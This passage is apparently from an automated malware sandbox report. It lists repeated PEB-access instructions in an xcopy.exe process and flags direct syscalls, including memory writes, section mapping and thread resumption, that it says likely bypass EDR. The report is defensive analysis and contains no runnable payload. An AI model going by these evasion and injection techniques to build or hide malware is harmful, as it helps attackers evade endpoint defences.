        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov ecx, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D0C0 mov eax, dword ptr fs:[00000030h]22_2_0395D0C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D0C0 mov eax, dword ptr fs:[00000030h]22_2_0395D0C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039220F0 mov ecx, dword ptr fs:[00000030h]22_2_039220F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E80E9 mov eax, dword ptr fs:[00000030h]22_2_038E80E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA0E3 mov ecx, dword ptr fs:[00000030h]22_2_038DA0E3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039050E4 mov eax, dword ptr fs:[00000030h]22_2_039050E4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039050E4 mov ecx, dword ptr fs:[00000030h]22_2_039050E4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039660E0 mov eax, dword ptr fs:[00000030h]22_2_039660E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC0F0 mov eax, dword ptr fs:[00000030h]22_2_038DC0F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03964000 mov ecx, dword ptr fs:[00000030h]22_2_03964000
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE016 mov eax, dword ptr fs:[00000030h]22_2_038FE016
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE016 mov eax, dword ptr fs:[00000030h]22_2_038FE016
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE016 mov eax, dword ptr fs:[00000030h]22_2_038FE016
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE016 mov eax, dword ptr fs:[00000030h]22_2_038FE016
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A903E mov eax, dword ptr fs:[00000030h]22_2_039A903E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A903E mov eax, dword ptr fs:[00000030h]22_2_039A903E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A903E mov eax, dword ptr fs:[00000030h]22_2_039A903E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A903E mov eax, dword ptr fs:[00000030h]22_2_039A903E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA020 mov eax, dword ptr fs:[00000030h]22_2_038DA020
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC020 mov eax, dword ptr fs:[00000030h]22_2_038DC020
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B052 mov eax, dword ptr fs:[00000030h]22_2_0390B052
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov ebx, dword ptr fs:[00000030h]22_2_0398705E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov eax, dword ptr fs:[00000030h]22_2_0398705E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03966050 mov eax, dword ptr fs:[00000030h]22_2_03966050
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E2050 mov eax, dword ptr fs:[00000030h]22_2_038E2050
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390C073 mov eax, dword ptr fs:[00000030h]22_2_0390C073
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D070 mov ecx, dword ptr fs:[00000030h]22_2_0395D070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396106E mov eax, dword ptr fs:[00000030h]22_2_0396106E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5060 mov eax, dword ptr fs:[00000030h]22_2_039B5060
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov ecx, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F78A mov eax, dword ptr fs:[00000030h]22_2_0399F78A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D7B0 mov eax, dword ptr fs:[00000030h]22_2_0390D7B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E07AF mov eax, dword ptr fs:[00000030h]22_2_038E07AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B37B6 mov eax, dword ptr fs:[00000030h]22_2_039B37B6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039697A9 mov eax, dword ptr fs:[00000030h]22_2_039697A9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EC7C0 mov eax, dword ptr fs:[00000030h]22_2_038EC7C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039607C3 mov eax, dword ptr fs:[00000030h]22_2_039607C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038ED7E0 mov ecx, dword ptr fs:[00000030h]22_2_038ED7E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E47FB mov eax, dword ptr fs:[00000030h]22_2_038E47FB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E47FB mov eax, dword ptr fs:[00000030h]22_2_038E47FB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03910710 mov eax, dword ptr fs:[00000030h]22_2_03910710
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5702 mov eax, dword ptr fs:[00000030h]22_2_038E5702
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5702 mov eax, dword ptr fs:[00000030h]22_2_038E5702
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7703 mov eax, dword ptr fs:[00000030h]22_2_038E7703
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391F71F mov eax, dword ptr fs:[00000030h]22_2_0391F71F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391F71F mov eax, dword ptr fs:[00000030h]22_2_0391F71F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C700 mov eax, dword ptr fs:[00000030h]22_2_0391C700
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E0710 mov eax, dword ptr fs:[00000030h]22_2_038E0710
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395C730 mov eax, dword ptr fs:[00000030h]22_2_0395C730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03915734 mov eax, dword ptr fs:[00000030h]22_2_03915734
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov eax, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov ecx, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov eax, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E3720 mov eax, dword ptr fs:[00000030h]22_2_038E3720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C720 mov eax, dword ptr fs:[00000030h]22_2_0391C720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C720 mov eax, dword ptr fs:[00000030h]22_2_0391C720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A972B mov eax, dword ptr fs:[00000030h]22_2_039A972B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E973A mov eax, dword ptr fs:[00000030h]22_2_038E973A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E973A mov eax, dword ptr fs:[00000030h]22_2_038E973A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F72E mov eax, dword ptr fs:[00000030h]22_2_0399F72E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9730 mov eax, dword ptr fs:[00000030h]22_2_038D9730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9730 mov eax, dword ptr fs:[00000030h]22_2_038D9730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922750 mov eax, dword ptr fs:[00000030h]22_2_03922750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922750 mov eax, dword ptr fs:[00000030h]22_2_03922750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03964755 mov eax, dword ptr fs:[00000030h]22_2_03964755
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B3749 mov eax, dword ptr fs:[00000030h]22_2_039B3749
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov esi, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov eax, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov eax, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E0750 mov eax, dword ptr fs:[00000030h]22_2_038E0750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E8770 mov eax, dword ptr fs:[00000030h]22_2_038E8770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4690 mov eax, dword ptr fs:[00000030h]22_2_038E4690
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4690 mov eax, dword ptr fs:[00000030h]22_2_038E4690
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039166B0 mov eax, dword ptr fs:[00000030h]22_2_039166B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD6AA mov eax, dword ptr fs:[00000030h]22_2_038DD6AA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD6AA mov eax, dword ptr fs:[00000030h]22_2_038DD6AA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C6A6 mov eax, dword ptr fs:[00000030h]22_2_0391C6A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A6C7 mov ebx, dword ptr fs:[00000030h]22_2_0391A6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A6C7 mov eax, dword ptr fs:[00000030h]22_2_0391A6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F6C7 mov eax, dword ptr fs:[00000030h]22_2_0399F6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039116CF mov eax, dword ptr fs:[00000030h]22_2_039116CF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039606F1 mov eax, dword ptr fs:[00000030h]22_2_039606F1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039606F1 mov eax, dword ptr fs:[00000030h]22_2_039606F1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399D6F0 mov eax, dword ptr fs:[00000030h]22_2_0399D6F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D6E0 mov eax, dword ptr fs:[00000030h]22_2_0390D6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D6E0 mov eax, dword ptr fs:[00000030h]22_2_0390D6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039136EF mov eax, dword ptr fs:[00000030h]22_2_039136EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
